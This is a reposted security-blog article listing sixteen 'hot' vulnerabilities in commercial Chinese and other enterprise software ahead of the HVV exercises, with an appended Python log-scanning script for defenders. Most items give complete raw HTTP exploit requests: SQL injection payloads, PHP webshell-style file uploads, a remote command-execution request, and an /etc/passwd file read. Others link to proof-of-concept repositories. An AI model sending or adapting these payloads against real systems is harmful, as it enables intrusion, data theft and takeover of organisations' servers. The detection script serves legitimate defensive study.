Selected Hot Vulnerabilities on the Eve of HVV

admin, 2023-08-13 07:18:50

1. Renwoxing (任我行) CRM SmsDataList SQL injection

POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.1361.63 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 170

Keywords=&StartSendDate=2020-06-17&EndSendDate=2020-09-17&SenderTypeId=00000000*

2. PigCMS action_flashUpload arbitrary file upload vulnerability

POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.2840.80 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundary=----aaa
Content-Length: 134

------aaa
Content-Disposition: form-data; name="filePath"; filename="test.php"
Content-Type: video/x-flv

<?php print "qaxnb123";?>
------aaa

3. Yonyou GRP-U8 info.log information disclosure

url + /logs/info.log

4. Dahua Smart Park Integrated Management Platform searchJson SQL injection

GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20@@version),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
Host: 127.0.0.1:8009
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.2333.119 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

5. NSFOCUS SAS bastion host Exec remote command execution

GET /webconf/Exec/index?cmd=whoami HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.2785.42 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

6. Ruijie NBR router fileupload.php arbitrary file upload

POST /ddi/server/fileupload.php?uploadDir=../../test&name=c0nfig.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.1360.23 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Disposition: form-data; name="file"; filename="111.php"
Content-Type: image/jpeg
Content-Length: 8

qaxnb123

7. Landray OA custom.jsp arbitrary file read vulnerability

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: 127.0.0.1:10082
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.1294.71 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 42

var={"body":{"file":"file:///etc/passwd"}}

8. Sangfor Application Delivery management system: remote command execution vulnerability in the login file

  • https://github.com/MzzdToT/HAC_Bored_Writing/tree/main/RCE/sangfor-login-rce

9. Tongda OA general/system/seal_manage/dianju/delete_log.php SQL injection vulnerability

GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

10. Weaver e-cology9 SQL injection

POST /mobile/%20/plugin/browser.jsp HTTP/1.1
Host: xxxxxxxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.15.99 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 2661

isDis=1&browserTypeId=269&keyword=[multi-layer URL-encoded value omitted]

11. Weaver E-Office 9.5 file upload

  • https://github.com/MzzdToT/HAC_Bored_Writing/tree/main/Fileupload/cve-2023-2648

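12. Yonyou Network Technology Co., Ltd. NC Cloud command execution vulnerability

  • https://github.com/MzzdToT/HAC_Bored_Writing/tree/main/RCE/Yongyou_NC_Cloud_upload_rce

13. Kingdee Cloud Xingkong (金蝶云星空, a cloud-based enterprise resource planning (ERP) product) deserialization vulnerability

  • https://github.com/MzzdToT/HAC_Bored_Writing/tree/main/RCE/Kingdee_erp_Unserialize_rce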

14. H3C Intelligent Management Center command execution vulnerability

  • https://github.com/MzzdToT/HAC_Bored_Writing/tree/main/RCE/CVE-2023-34928

15. Openfire authentication bypass vulnerability

  • https://github.com/MzzdToT/HAC_Bored_Writing/tree/main/unauthorized/CVE-2023-32315

16. jmreport/qurestSql unauthenticated SQL injection

  • https://github.com/MzzdToT/HAC_Bored_Writing/tree/main/Sqlinject/CVE-2023-1454
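
For defenders, the request paths shown in items 1 to 7, 9 and 10 can be searched for in web access logs. The following is an added example, not part of the original article: the function names are hypothetical, the log lines are constructed, and request targets are percent-decoded repeatedly because item 10 shows a value encoded in several layers.

```python
import re
from urllib.parse import unquote

# Path signatures taken from the requests listed in items 1-7, 9 and 10 above.
SIGNATURES = {
    "item 1 Renwoxing CRM SmsDataList": "/sms/smsdatalist",
    "item 2 PigCMS action_flashUpload": "a=action_flashupload",
    "item 3 Yonyou GRP-U8 info.log": "/logs/info.log",
    "item 4 Dahua searchJson": "/carquery/getfacecapture/searchjson",
    "item 5 NSFOCUS SAS Exec": "/webconf/exec/index",
    "item 6 Ruijie NBR fileupload.php": "/ddi/server/fileupload.php",
    "item 7 Landray custom.jsp": "/sys/ui/extend/varkind/custom.jsp",
    "item 9 Tongda delete_log.php": "/seal_manage/dianju/delete_log.php",
    "item 10 Weaver browser.jsp": "/plugin/browser.jsp",
}
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=5):
    """Percent-decode until the value stops changing (bounded number of rounds)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def match_line(log_line):
    """Return the labels of every signature found in one access-log line."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    target = fully_decode(m.group(1)).lower()
    return [label for label, needle in SIGNATURES.items() if needle in target]

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Aug/2023:07:00:01 +0800] "GET /index.html HTTP/1.1" 200 512',
    '10.0.0.9 - - [13/Aug/2023:07:00:02 +0800] "GET /webconf/Exec/index?cmd=whoami HTTP/1.1" 200 16',
    '10.0.0.9 - - [13/Aug/2023:07:00:03 +0800] "POST /mobile/%2520/plugin/browser.jsp HTTP/1.1" 200 90',
    '10.0.0.9 - - [13/Aug/2023:07:00:04 +0800] "GET /logs/info%252elog HTTP/1.1" 200 40960',
]

def scan(lines):
    """Map line index to matched labels, skipping lines with no match."""
    return {i: hits for i, line in enumerate(lines) if (hits := match_line(line))}

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG).items():
        print(idx, hits)
```

A hit only shows that the path was requested; the response status and size in the same log line help separate probing from a request the server actually served.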

 

 


Originally published on the WeChat official account Ots安全: Selected Hot Vulnerabilities on the Eve of HVV

  • Published on 2023-08-13 07:18:50
  • When reposting, please keep the link to this article (CN-SEC中文网, with thanks to the original author): http://cn-sec.com/archives/1987349.html
